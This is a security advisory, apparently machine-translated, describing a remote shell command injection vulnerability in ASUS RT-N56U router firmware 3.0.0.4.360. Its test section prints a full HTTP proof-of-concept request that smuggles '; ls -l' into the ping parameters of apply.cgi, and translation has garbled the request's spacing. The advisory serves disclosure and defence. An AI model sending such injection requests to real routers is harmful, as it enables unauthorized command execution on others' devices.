Release date:
Updated on:
Affected Systems:
Asus RT-N56U 3.0.0.4.360
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60431
The ASUS RT-N56U is a wireless broadband router.
ASUS RT-N56U 3.0.0.4.360 and earlier versions of the input filter is lax, there is a remote shell command injection vulnerability, successful exploitation can allow attackers to upload and execute arbitrary commands in the context of the affected device.
<* Source: drone
Link: http://www.exploit-db.com/exploits/25998/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
GET/apply. cgi? Current_page = Main_Analysis_Content.asp & amp; next_page = Main_Analysis_Content.asp & amp; next_host = www.example3.com & amp; group_id = & amp; modified = 0 & amp; action_mode = + Refresh + & amp; action_script = & amp; action_wait = & amp; first_time = & amp; preferred_lang = EN & amp; systemCmd = ping +-c + 5 + % 3B + ls +-l & amp; firmver = 3.0.0.4 & amp; unlock method = ping & amp; destIP = % 3B + ls +-l +. % 2 Fuser % 2Fcgi-bin % 2F & amp; pingCNT = 5 HTTP/1.1
Host: www.example.com
Proxy-Connection: keep-alive
Authorization: Basic ZGVmYXVsdA =
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
Referer: http://www.example.com/Main_Analysis_Content.asp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US, en; q = 0.8
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Asus
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.asus.com.tw